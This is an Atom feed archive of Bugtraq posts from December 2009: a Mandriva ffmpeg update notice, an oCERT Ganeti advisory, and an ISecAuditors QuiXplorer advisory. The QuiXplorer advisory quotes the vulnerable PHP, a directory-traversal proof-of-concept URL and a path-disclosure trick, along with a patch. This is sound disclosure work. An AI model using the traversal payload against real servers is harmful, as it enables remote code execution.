<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
	<id>tag:old.nabble.com,2006:forum-401</id>
	<title>Nabble - Bugtraq</title>
	<updated>2009-12-17T11:06:01Z</updated>
	<link rel="self" type="application/atom+xml" href="http://old.nabble.com/Bugtraq-f401.xml" />
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Bugtraq-f401.html" />
	<subtitle type="html">Arguably the most important Internet security list. Vulnerabilities are often announced here first, so check frequently! - comments provided by seclists.org</subtitle>
	
<entry>
	<id>tag:old.nabble.com,2006:post-26833693</id>
	<title>[ MDVSA-2009:335 ] ffmpeg</title>
	<published>2009-12-17T11:06:01Z</published>
	<updated>2009-12-17T11:06:01Z</updated>
	<author>
		<name>security-22</name>
	</author>
	<content type="html">&lt;br&gt;-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux Security Advisory &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MDVSA-2009:335
&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://www.mandriva.com/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Package : ffmpeg
&lt;br&gt;&amp;nbsp;Date &amp;nbsp; &amp;nbsp;: December 17, 2009
&lt;br&gt;&amp;nbsp;Affected: 2008.0, 2009.0, Enterprise Server 5.0
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Problem Description:
&lt;br&gt;&lt;br&gt;&amp;nbsp;A vulnerability was discovered and corrected in ffmpeg:
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;MPlayer allows remote attackers to cause a denial of service
&lt;br&gt;&amp;nbsp;(application crash) via (1) a malformed AAC file, as demonstrated
&lt;br&gt;&amp;nbsp;by lol-vlc.aac; or (2) a malformed Ogg Media (OGM) file, as
&lt;br&gt;&amp;nbsp;demonstrated by lol-ffplay.ogm, different vectors than CVE-2007-6718
&lt;br&gt;&amp;nbsp;(CVE-2008-4610).
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;Packages for 2008.0 are being provided due to extended support for
&lt;br&gt;&amp;nbsp;Corporate products.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;This update provides a solution to this vulnerability.
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;References:
&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4610&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4610&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Updated Packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2008.0:
&lt;br&gt;&amp;nbsp;beeabb1996d9bf736309cc48dacf59a1 &amp;nbsp;2008.0/i586/ffmpeg-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;6cc819d7659aa3c3110a09764341f17a &amp;nbsp;2008.0/i586/libavformats51-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;a64149c0223fce925bcc9a44261379a8 &amp;nbsp;2008.0/i586/libavutil49-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;e32ff29ad5bb4988009ba73d587f22d1 &amp;nbsp;2008.0/i586/libffmpeg51-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;432a60bd0ffbe8faad641154f161b12c &amp;nbsp;2008.0/i586/libffmpeg51-devel-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;bef39a87bdfe586aa27a8124a5f42b46 &amp;nbsp;2008.0/i586/libffmpeg51-static-devel-0.4.9-3.pre1.8994.2.4mdv2008.0.i586.rpm 
&lt;br&gt;&amp;nbsp;f3dcc5d0422d10a807f19beec6460401 &amp;nbsp;2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.4mdv2008.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2008.0/X86_64:
&lt;br&gt;&amp;nbsp;0adb11ce92b7023d84e17c47b416a02e &amp;nbsp;2008.0/x86_64/ffmpeg-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;f99f57c6bd2c1c905723de5d23cbc78d &amp;nbsp;2008.0/x86_64/lib64avformats51-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;1848eaa502b484235fc49d9dee5f46ee &amp;nbsp;2008.0/x86_64/lib64avutil49-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;3bbabab6bb9461f1ac9f0991b7669dc8 &amp;nbsp;2008.0/x86_64/lib64ffmpeg51-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;391c848cb410158b73199e7f2e02733a &amp;nbsp;2008.0/x86_64/lib64ffmpeg51-devel-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;b2bc211725adcebe19a1ed90c87248e1 &amp;nbsp;2008.0/x86_64/lib64ffmpeg51-static-devel-0.4.9-3.pre1.8994.2.4mdv2008.0.x86_64.rpm 
&lt;br&gt;&amp;nbsp;f3dcc5d0422d10a807f19beec6460401 &amp;nbsp;2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.4mdv2008.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.0:
&lt;br&gt;&amp;nbsp;9e6955be6fc29847200a396543e91f91 &amp;nbsp;2009.0/i586/ffmpeg-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;e793f88f8612e83b87c75d28aa7b3ee3 &amp;nbsp;2009.0/i586/libavformats52-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;510e5d64d1f3ce851aa58295048b6ce4 &amp;nbsp;2009.0/i586/libavutil49-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;81d1d46a7b798bb137a3ce65433c5450 &amp;nbsp;2009.0/i586/libffmpeg51-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;abf4b34aa90f1cfd613cf5e5bba6d01d &amp;nbsp;2009.0/i586/libffmpeg-devel-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;62841712208ab5dc5131383715e46e45 &amp;nbsp;2009.0/i586/libffmpeg-static-devel-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;b523f312fcbe542a68af8415535813bb &amp;nbsp;2009.0/i586/libswscaler0-0.4.9-3.pre1.14161.1.3mdv2009.0.i586.rpm 
&lt;br&gt;&amp;nbsp;95a8fe70eb607239e0fefe877345b8e3 &amp;nbsp;2009.0/SRPMS/ffmpeg-0.4.9-3.pre1.14161.1.3mdv2009.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.0/X86_64:
&lt;br&gt;&amp;nbsp;b25852f91e95c0dd6cac413421f09817 &amp;nbsp;2009.0/x86_64/ffmpeg-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;d5d5e19e0a589924a37cd82addc3d135 &amp;nbsp;2009.0/x86_64/lib64avformats52-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;e8b76380ce69b61d745aa3365b89a0d1 &amp;nbsp;2009.0/x86_64/lib64avutil49-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;b52751767266afc6e30697905cc0a22d &amp;nbsp;2009.0/x86_64/lib64ffmpeg51-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;d4a24cd43474784d990e2d18b1fbeb88 &amp;nbsp;2009.0/x86_64/lib64ffmpeg-devel-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;5c618faeabddbf34969458b9bf3be9ed &amp;nbsp;2009.0/x86_64/lib64ffmpeg-static-devel-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;e584888b791440e6427c25dddad185f5 &amp;nbsp;2009.0/x86_64/lib64swscaler0-0.4.9-3.pre1.14161.1.3mdv2009.0.x86_64.rpm 
&lt;br&gt;&amp;nbsp;95a8fe70eb607239e0fefe877345b8e3 &amp;nbsp;2009.0/SRPMS/ffmpeg-0.4.9-3.pre1.14161.1.3mdv2009.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Enterprise Server 5:
&lt;br&gt;&amp;nbsp;a9bad1d3f80f6abc794e12b7a616118b &amp;nbsp;mes5/i586/ffmpeg-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;2e1de6fd3253390d5a97f44ce410ef7a &amp;nbsp;mes5/i586/libavformats52-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;d59edc9e6f14340853b421805846238b &amp;nbsp;mes5/i586/libavutil49-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;22c19b94d9e6e887e080a16a724083b9 &amp;nbsp;mes5/i586/libffmpeg51-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;a1771b311f17e89ee35aca056e3a2fe3 &amp;nbsp;mes5/i586/libffmpeg-devel-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;ef57ad2c274230c8924cf7f85901d956 &amp;nbsp;mes5/i586/libffmpeg-static-devel-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;c9391186267f11449a359a9a3f46c10f &amp;nbsp;mes5/i586/libswscaler0-0.4.9-3.pre1.14161.1.3mdvmes5.i586.rpm 
&lt;br&gt;&amp;nbsp;24d45cd3251b8876c41d60e164f61db2 &amp;nbsp;mes5/SRPMS/ffmpeg-0.4.9-3.pre1.14161.1.3mdvmes5.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Enterprise Server 5/X86_64:
&lt;br&gt;&amp;nbsp;d89476745c6defb6299cc521dcb9d811 &amp;nbsp;mes5/x86_64/ffmpeg-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;1ec046f0bc0d805cbddc0a09eb731813 &amp;nbsp;mes5/x86_64/lib64avformats52-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;21f1a295e0d12ed3bf8e91e18e557d4a &amp;nbsp;mes5/x86_64/lib64avutil49-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;2ac6b11c3cdffbfb7ce66ec7ed92794b &amp;nbsp;mes5/x86_64/lib64ffmpeg51-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;0958f365fc0377700789901f3cfc70b4 &amp;nbsp;mes5/x86_64/lib64ffmpeg-devel-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;2283f579aef13eb81f97f37b694f6393 &amp;nbsp;mes5/x86_64/lib64ffmpeg-static-devel-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;d1d3b94079ddff1e40e19b351714c1fd &amp;nbsp;mes5/x86_64/lib64swscaler0-0.4.9-3.pre1.14161.1.3mdvmes5.x86_64.rpm 
&lt;br&gt;&amp;nbsp;24d45cd3251b8876c41d60e164f61db2 &amp;nbsp;mes5/SRPMS/ffmpeg-0.4.9-3.pre1.14161.1.3mdvmes5.src.rpm
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;To upgrade automatically use MandrivaUpdate or urpmi. &amp;nbsp;The verification
&lt;br&gt;&amp;nbsp;of md5 checksums and GPG signatures is performed automatically for you.
&lt;br&gt;&lt;br&gt;&amp;nbsp;All packages are signed by Mandriva for security. &amp;nbsp;You can obtain the
&lt;br&gt;&amp;nbsp;GPG public key of the Mandriva Security Team by executing:
&lt;br&gt;&lt;br&gt;&amp;nbsp; gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
&lt;br&gt;&lt;br&gt;&amp;nbsp;You can view other update advisories for Mandriva Linux at:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://www.mandriva.com/security/advisories&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/advisories&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;If you want to report vulnerabilities, please contact
&lt;br&gt;&lt;br&gt;&amp;nbsp; security_(at)_mandriva.com
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Type Bits/KeyID &amp;nbsp; &amp;nbsp; Date &amp;nbsp; &amp;nbsp; &amp;nbsp; User ID
&lt;br&gt;&amp;nbsp;pub &amp;nbsp;1024D/22458A98 2000-07-10 Mandriva Security Team
&lt;br&gt;&amp;nbsp; &amp;lt;security*mandriva.com&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.9 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFLKlMxmqjQ0CJFipgRAnrBAKCLwSWexDuGzACY5dZuH42BvRzYqgCeIpiR
&lt;br&gt;ToKThFbj+KOsukdA6OcMMGA=
&lt;br&gt;=yb49
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/--MDVSA-2009%3A335---ffmpeg-tp26833693p26833693.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26831889</id>
	<title>[ISecAuditors Security Advisories] QuiXplorer &lt;=2.4.1beta Remote Code Execution vulnerability</title>
	<published>2009-12-17T08:34:05Z</published>
	<updated>2009-12-17T08:34:05Z</updated>
	<author>
		<name>ISecAuditors Security Advisories</name>
	</author>
	<content type="html">=============================================
&lt;br&gt;INTERNET SECURITY AUDITORS ALERT 2009-003
&lt;br&gt;- Original release date: March 2nd, 2009
&lt;br&gt;- Last revised: &amp;nbsp;December 17th, 2009
&lt;br&gt;- Discovered by: Juan Galiana Lara
&lt;br&gt;- Severity: 9/10 (CVSS scored)
&lt;br&gt;=============================================
&lt;br&gt;&lt;br&gt;I. VULNERABILITY
&lt;br&gt;-------------------------
&lt;br&gt;QuiXplorer &amp;lt;= 2.4.1beta standalone and as a Mambo/Joomla component
&lt;br&gt;'lang' parameter Remote Code Execution Vulnerability.
&lt;br&gt;&lt;br&gt;II. BACKGROUND
&lt;br&gt;-------------------------
&lt;br&gt;QuiXplorer is a multi-user, web-based file-manager. It allows you to
&lt;br&gt;manage and/or share files over the Internet, or an Intranet.
&lt;br&gt;It's currently available in many languages and with GPL and MPL
&lt;br&gt;licenses and referred in other open source projects.
&lt;br&gt;&lt;br&gt;III. DESCRIPTION
&lt;br&gt;-------------------------
&lt;br&gt;QuiXplorer is prone to a local file include and directory traversal
&lt;br&gt;vulnerability because the application fails to sufficiently sanitize
&lt;br&gt;user-supplied input. The parameter 'lang' is not properly sanitized.
&lt;br&gt;Since the application allows to upload files to the server could be
&lt;br&gt;combined with previous vulnerabilities to allow an attacker to execute
&lt;br&gt;arbitrary code remotely in the context of the webserver. This may aid
&lt;br&gt;in launching further attacks.
&lt;br&gt;&lt;br&gt;In order to perform the attack, an attacker could upload a PHP
&lt;br&gt;malicious code (upload action is allowed by the application), then
&lt;br&gt;exploit a bug to know the full path to the local file recently
&lt;br&gt;uploaded (if 'display_errors' directive is set to On) and then include
&lt;br&gt;it exploiting the local file include and directory traversal flaw
&lt;br&gt;(using ../../path/to/file) to finally execute the PHP code.
&lt;br&gt;Successfully exploitation of this flaw may aid in the compromise of
&lt;br&gt;the server in the context of the webserver.
&lt;br&gt;&lt;br&gt;IV. PROOF OF CONCEPT
&lt;br&gt;-------------------------
&lt;br&gt;Here is the affected code:
&lt;br&gt;&lt;br&gt;&amp;nbsp;80 // Get Language
&lt;br&gt;&amp;nbsp;81
&lt;br&gt;if(isset($GLOBALS['__GET'][&amp;quot;lang&amp;quot;]))$GLOBALS[&amp;quot;lang&amp;quot;]=$GLOBALS['__GET'][&amp;quot;lang&amp;quot;];
&lt;br&gt;&amp;nbsp;82
&lt;br&gt;elseif(isset($GLOBALS['__POST'][&amp;quot;lang&amp;quot;]))$GLOBALS[&amp;quot;lang&amp;quot;]=$GLOBALS['__POST'][&amp;quot;lang&amp;quot;];
&lt;br&gt;&amp;nbsp;83
&lt;br&gt;//------------------------------------------------------------------------------
&lt;br&gt;&amp;nbsp;84 // Necessary files
&lt;br&gt;&amp;nbsp;85 ob_start(); // prevent unwanted output
&lt;br&gt;&amp;nbsp;86 require &amp;quot;./.config/conf.php&amp;quot;;
&lt;br&gt;&amp;nbsp;87 if(isset($GLOBALS[&amp;quot;lang&amp;quot;])) $GLOBALS[&amp;quot;language&amp;quot;]=$GLOBALS[&amp;quot;lang&amp;quot;];
&lt;br&gt;&amp;nbsp;88 require &amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;.php&amp;quot;; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;lt;----- HERE
&lt;br&gt;&amp;nbsp;89 require &amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;_mimes.php&amp;quot;; &amp;nbsp;&amp;lt;----- HERE
&lt;br&gt;&lt;br&gt;Here is a poc:
&lt;br&gt;PoC: &lt;a href=&quot;http://site/path/?lang=../path/to/malicious_uploaded_code&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/path/?lang=../path/to/malicious_uploaded_code&lt;/a&gt;&lt;br&gt;&lt;br&gt;Exploiting this bug is possible to include PHP files, allowing to
&lt;br&gt;execute any arbitrary code code he want.
&lt;br&gt;Also is possible to hide the crafted parameters data including it
&lt;br&gt;through POST method, making detection more difficult to site
&lt;br&gt;administrator.
&lt;br&gt;&lt;br&gt;About the full path disclosure, if the webserver has the show_errors
&lt;br&gt;directive set to 'On', try:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://site/path/?lang=no_exists&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/path/?lang=no_exists&lt;/a&gt;&lt;br&gt;&lt;br&gt;And the application return:
&lt;br&gt;&lt;br&gt;Warning: require(./_lang/no_exists.php) [function.require]: failed to
&lt;br&gt;open stream: No such file or directory in
&lt;br&gt;/var/www/quix/.include/init.php on line 88
&lt;br&gt;Fatal error: require() [function.require]: Failed opening required
&lt;br&gt;'./_lang/no_exists.php'
&lt;br&gt;(include_path='.:/usr/share/php:/usr/share/pear') in
&lt;br&gt;/var/www/quix/.include/init.php on line 88
&lt;br&gt;&lt;br&gt;Revealing the path to the home directory of the filemanager
&lt;br&gt;&lt;br&gt;V. BUSINESS IMPACT
&lt;br&gt;-------------------------
&lt;br&gt;An attacker could view any file or execute arbitrary code remotely
&lt;br&gt;into the context of the webserver.
&lt;br&gt;&lt;br&gt;VI. SYSTEMS AFFECTED
&lt;br&gt;-------------------------
&lt;br&gt;All version of QuiXplorer are affected.
&lt;br&gt;At the moment &amp;lt;= 2.4.1beta.
&lt;br&gt;&lt;br&gt;VII. SOLUTION
&lt;br&gt;-------------------------
&lt;br&gt;As developers give no response we add the mitigation for its solution.
&lt;br&gt;To patch only change this lines...
&lt;br&gt;&lt;br&gt;From:
&lt;br&gt;&amp;nbsp;81 if(isset($GLOBALS['__GET'][&amp;quot;lang&amp;quot;]))
&lt;br&gt;$GLOBALS[&amp;quot;lang&amp;quot;]=$GLOBALS['__GET'][&amp;quot;lang&amp;quot;];
&lt;br&gt;&amp;nbsp;82 elseif(isset($GLOBALS['__POST'][&amp;quot;lang&amp;quot;]))
&lt;br&gt;$GLOBALS[&amp;quot;lang&amp;quot;]=$GLOBALS['__POST'][&amp;quot;lang&amp;quot;];
&lt;br&gt;&lt;br&gt;To:
&lt;br&gt;&amp;nbsp;81 if(isset($GLOBALS['__GET'][&amp;quot;lang&amp;quot;]))
&lt;br&gt;$GLOBALS[&amp;quot;lang&amp;quot;]=basename($GLOBALS['__GET'][&amp;quot;lang&amp;quot;]);
&lt;br&gt;&amp;nbsp;82 elseif(isset($GLOBALS['__POST'][&amp;quot;lang&amp;quot;]))
&lt;br&gt;$GLOBALS[&amp;quot;lang&amp;quot;]=basename($GLOBALS['__POST'][&amp;quot;lang&amp;quot;]);
&lt;br&gt;&lt;br&gt;Parsing the parameters with basename() function the flaw its fixed.
&lt;br&gt;&lt;br&gt;And to prevent the full path disclosure...
&lt;br&gt;&lt;br&gt;From:
&lt;br&gt;&amp;nbsp;88 require &amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;.php&amp;quot;;
&lt;br&gt;&amp;nbsp;89 require &amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;_mimes.php&amp;quot;;
&lt;br&gt;&lt;br&gt;To:
&lt;br&gt;&amp;nbsp;88 if(file_exists(&amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;.php&amp;quot;)) require
&lt;br&gt;&amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;.php&amp;quot;;
&lt;br&gt;&amp;nbsp;89 else require &amp;quot;./_lang/en.php&amp;quot;;
&lt;br&gt;&amp;nbsp;90 if(file_exists(&amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;_mimes.php&amp;quot;))
&lt;br&gt;require &amp;quot;./_lang/&amp;quot;.$GLOBALS[&amp;quot;language&amp;quot;].&amp;quot;_mimes.php&amp;quot;;
&lt;br&gt;&amp;nbsp;91 else require &amp;quot;./_lang/en_mimes.php&amp;quot;;
&lt;br&gt;&lt;br&gt;VIII. REFERENCES
&lt;br&gt;-------------------------
&lt;br&gt;&lt;a href=&quot;http://sourceforge.net/projects/quixplorer/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sourceforge.net/projects/quixplorer/&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.isecauditors.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.isecauditors.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;IX. CREDITS
&lt;br&gt;-------------------------
&lt;br&gt;This vulnerability has been discovered
&lt;br&gt;by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
&lt;br&gt;&lt;br&gt;X. REVISION HISTORY
&lt;br&gt;-------------------------
&lt;br&gt;March &amp;nbsp; &amp;nbsp;02, 2009: Initial release.
&lt;br&gt;December 17, 2009: Last revision.
&lt;br&gt;&lt;br&gt;XI. DISCLOSURE TIMELINE
&lt;br&gt;-------------------------
&lt;br&gt;March &amp;nbsp; &amp;nbsp;02, 2009: Vulnerability acquired by
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Internet Security Auditors (www.isecauditors.com)
&lt;br&gt;March &amp;nbsp; &amp;nbsp;03, 2009: QuiXplorer contacted. No answer.
&lt;br&gt;December 13, 2009: QuiXplorer contacted again. No answer.
&lt;br&gt;December 17, 2009: Sent to lists with remediation proposal.
&lt;br&gt;&lt;br&gt;XII. LEGAL NOTICES
&lt;br&gt;-------------------------
&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot;
&lt;br&gt;with no warranties or guarantees of fitness of use or otherwise.
&lt;br&gt;Internet Security Auditors accepts no responsibility for any damage
&lt;br&gt;caused by the use or misuse of this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-ISecAuditors-Security-Advisories--QuiXplorer-%3C%3D2.4.1beta-Remote-Code-Execution-vulnerability-tp26831889p26831889.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26833819</id>
	<title>[Suspected Spam][oCERT-2009-019] Ganeti path sanitization errors</title>
	<published>2009-12-17T08:26:31Z</published>
	<updated>2009-12-17T08:26:31Z</updated>
	<author>
		<name>Andrea Barisani-4</name>
	</author>
	<content type="html">&lt;br&gt;#2009-019 Ganeti path sanitization errors
&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;&lt;br&gt;Ganeti, an open source virtualisation manager, suffers from an input
&lt;br&gt;validation bug that poses a security risk.
&lt;br&gt;&lt;br&gt;The vulnerability applies to the commands submitted, either locally via
&lt;br&gt;gnt-* commands or remotely via the HTTP API, to the machine acting as a
&lt;br&gt;cluster master. Validation for a file path argument is missing resulting
&lt;br&gt;in arbitrary code execution, local exploitation applies to any user with
&lt;br&gt;rights to execute ganeti commands while remote exploitation applies to
&lt;br&gt;configured users authenticated over the ganeti RAPI.
&lt;br&gt;&lt;br&gt;While the local exploitation is a non-issue for the root user, which can
&lt;br&gt;execute arbitrary commands in any case, it affects local non-root users
&lt;br&gt;which are allowed to execute gnt-* commands via sudo or other suid
&lt;br&gt;wrappers.
&lt;br&gt;&lt;br&gt;Affected version:
&lt;br&gt;&lt;br&gt;Ganeti &amp;gt;= 1.2.4 (local), &amp;gt;= 2.0.0 (remote)
&lt;br&gt;&lt;br&gt;Fixed version:
&lt;br&gt;&lt;br&gt;Ganeti &amp;gt;= 1.2.9, &amp;gt;= 2.0.5, &amp;gt;= 2.1.0~rc2
&lt;br&gt;&lt;br&gt;Credit: vulnerability report, PoC and patches received from Ganeti authors
&lt;br&gt;Iustin Pop and Michael Hanselmann, Google Inc.
&lt;br&gt;&lt;br&gt;CVE: CVE-2009-4261
&lt;br&gt;&lt;br&gt;CVE: N/A
&lt;br&gt;&lt;br&gt;Timeline:
&lt;br&gt;&lt;br&gt;2009-12-07: vulnerability report received
&lt;br&gt;2009-12-08: contacted affected vendors
&lt;br&gt;2009-12-17: ganeti 1.2.9, 2.0.5, 2.1.0~rc2 released
&lt;br&gt;2009-12-17: advisory published
&lt;br&gt;&lt;br&gt;References:
&lt;br&gt;&lt;a href=&quot;http://groups.google.com/group/ganeti/browse_thread/thread/cbce23d89103a8d2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://groups.google.com/group/ganeti/browse_thread/thread/cbce23d89103a8d2&lt;/a&gt;&lt;br&gt;&lt;br&gt;Permalink:
&lt;br&gt;&lt;a href=&quot;http://www.ocert.org/advisories/ocert-2009-019.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.ocert.org/advisories/ocert-2009-019.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;-- 
&lt;br&gt;Andrea Barisani | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Founder &amp; Project Coordinator
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; oCERT | Open Source Computer Emergency Response Team
&lt;br&gt;&lt;br&gt;&amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26833819&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;lcars@...&lt;/a&gt;&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.ocert.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.ocert.org&lt;/a&gt;&lt;br&gt;&amp;nbsp;0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;quot;Pluralitas non est ponenda sine necessitate&amp;quot;
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-Suspected-Spam--oCERT-2009-019--Ganeti-path-sanitization-errors-tp26833819p26833819.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26831720</id>
